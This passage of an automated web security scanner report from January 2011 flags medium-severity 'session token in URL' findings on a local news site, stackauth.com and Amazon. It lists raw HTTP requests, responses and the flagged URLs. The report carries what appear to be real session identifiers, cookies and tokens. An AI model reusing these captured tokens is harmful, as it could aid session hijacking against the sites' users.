Set-Cookie: MUID=54E9E8A3E60641D9AC7FE4403046D572; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.7. http://local.redacted/news.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.redacted
Path:	/news.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /news.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3953a7e65afb42b0ade3749d752dcf1c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C14043A1E67E44BCAA9A3B68AA8AFD89; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.8. http://local.redacted/restaurants.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.redacted
Path:	/restaurants.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /restaurants.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA31
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=11c3bf43b93e4ed9af237f65b02844d7; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=47142BBDAAA74E00893F20DA82ED8C2E; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.9. http://local.redacted/sports.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.redacted
Path:	/sports.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /sports.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:41 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d11d2c165e674866abd16c8b8cb9e1bb; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A7A43B87D4E04DEA9AC850EC95E92AE2; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 94929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.10. http://local.redacted/ten-day.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.redacted
Path:	/ten-day.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /ten-day.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:49 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b091c91e5f57464f867c86a6838b0181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5D4B178CF6734098BD0B688BB765F218; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:49 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.11. http://local.redacted/weather.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.redacted
Path:	/weather.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /weather.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:33 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fd5b4d05da194df0bdd44cf8adbd21ef; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2B70DCC8FEC94F45B962D0715AF96955; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:33 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.12. http://stackauth.com/auth/global/read previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://stackauth.com
Path:	/auth/global/read

Issue detail

The URL in the request appears to contain a session token within the query string:

http://stackauth.com/auth/global/read?request=lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIGqtPflTj16ER0fdpDutY%2BTxasmc8BrnyYDeYjNVIsJs2AVBeBqTJirA%3D%3D&nonce=on9FTQAAAACIr5drBee4yA%3D%3D

Request

GET /auth/global/read?request=lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIGqtPflTj16ER0fdpDutY%2BTxasmc8BrnyYDeYjNVIsJs2AVBeBqTJirA%3D%3D&nonce=on9FTQAAAACIr5drBee4yA%3D%3D HTTP/1.1
Host: stackauth.com
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:11:31 GMT
Content-Length: 1199

<html><head>
<script type='text/javascript'>
var data = {"ReadSession":"http://stackauth.com/auth/global/read-session","Request":"lNFEJmiMWRvnZEvOWYpUnSipo9yf2IIG
...[SNIP]...

11.13. http://thelastword.msnbc.redacted/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://thelastword.msnbc.redacted
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

https://secure.unicefusa.org/site/Donation2?df_id=9040&9040.donation=form1&JServSessionIdr004=uepo7wal02.app220b

Request

GET / HTTP/1.1
Host: thelastword.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.14. http://www.amazon.com/gp/product/0470650923 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0470650923

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=amb_link_354882122_1/181-4491985-5345663?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0FB6KRV0MVS1BJJ37AT4&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923
http://www.amazon.com/gp/redirect.html/ref=amb_link_354882122_3/181-4491985-5345663?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0FB6KRV0MVS1BJJ37AT4&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_Elkrnb0BKVMSB?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_fa_dp_Elkrnb0BKVMSB%26bodytext%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_Elkrnb0BKVMSB?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0470650923%252Fref%253Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2NSUXLDO2I6M6/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3FBA86291749D688488CEA106BE335E1743120FF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R2NSUXLDO2I6M6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2NSUXLDO2I6M6/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=07E1EFC20DEA1370E94DA037D58412612D612DC4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R2NSUXLDO2I6M6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663
http://www.amazon.com/gp/voting/cast/Reviews/2115/R2NSUXLDO2I6M6/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=E7D791ED7EF4FDFBB5F52DBAE04F4A9F21767750&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R2NSUXLDO2I6M6.2115.Inappropriate.Reviews&voteSessionID=181-4491985-5345663
http://www.amazon.com/gp/voting/cast/Reviews/2115/R5IOGQXSAO3Y6/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BC772305F27C460C702988070CFF7CF42E798E6D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R5IOGQXSAO3Y6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663
http://www.amazon.com/gp/voting/cast/Reviews/2115/R5IOGQXSAO3Y6/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=282E89A0EE70EE633F6F8C0F4D12DE05950BCFEB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R5IOGQXSAO3Y6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663
http://www.amazon.com/gp/voting/cast/Reviews/2115/R5IOGQXSAO3Y6/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=949CE8B36BE4EA4C9C2C9469C7C0601236CC2DA9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R5IOGQXSAO3Y6.2115.Inappropriate.Reviews&voteSessionID=181-4491985-5345663
http://www.amazon.com/gp/voting/cast/Reviews/2115/RBKOFMQCA9K6F/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DEBBAD29F1E4EF197B389FB5C86C202273418E26&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=RBKOFMQCA9K6F.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663
http://www.amazon.com/gp/voting/cast/Reviews/2115/RBKOFMQCA9K6F/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=CC4569FB0DBC1BF923E603531B628A08178FD030&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=RBKOFMQCA9K6F.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663
http://www.amazon.com/gp/voting/cast/Reviews/2115/RBKOFMQCA9K6F/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=6E2B0E141A950C12A1E0716EC94D5E45A04F01B6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=RBKOFMQCA9K6F.2115.Inappropriate.Reviews&voteSessionID=181-4491985-5345663

Request

GET /gp/product/0470650923 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:33 GMT
Server: Server
x-amz-id-1: 0FB6KRV0MVS1BJJ37AT4
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: l51TKC8bD5OicdfsGYvcPObyVpYJLR9Rx7zE2Y4nwPxVFwBYnt1W1uWwp6YohY8J
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=181-4491985-5345663; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 409295

<html>
<head>

<style type="text/css"><!--

BODY { font-
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_Elkrnb0BKVMSB?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_fa_dp_Elkrnb0BKVMSB%26bodytext%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_Elkrnb0BKVMSB?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_fa_dp_Elkrnb0BKVMSB%26bodytext%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_Elkrnb0BKVMSB?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0470650923%252Fref%253Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_Elkrnb0BKVMSB?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0470650923%252Fref%253Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DProfessional%2520Silverlight%25204%2520(Wrox%2520Programmer%2520to%2520Programmer)%2520by%2520Jason%2520Beres%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0470650923%2Fref%3Dcm_sw_r_tw_dp_Elkrnb0BKVMSB%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<td style="font-size: 11px;"><a href="/gp/redirect.html/ref=amb_link_354882122_1/181-4491985-5345663?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0FB6KRV0MVS1BJJ37AT4&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>

FREE Two-Day Shipping for Students. <a href="/gp/redirect.html/ref=amb_link_354882122_3/181-4491985-5345663?location=http://www.amazon.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0FB6KRV0MVS1BJJ37AT4&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923">Learn more</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2NSUXLDO2I6M6/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=07E1EFC20DEA1370E94DA037D58412612D612DC4&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R2NSUXLDO2I6M6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2NSUXLDO2I6M6/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=3FBA86291749D688488CEA106BE335E1743120FF&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R2NSUXLDO2I6M6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R2NSUXLDO2I6M6/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=E7D791ED7EF4FDFBB5F52DBAE04F4A9F21767750&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R2NSUXLDO2I6M6.2115.Inappropriate.Reviews&voteSessionID=181-4491985-5345663"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RBKOFMQCA9K6F/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=CC4569FB0DBC1BF923E603531B628A08178FD030&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=RBKOFMQCA9K6F.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
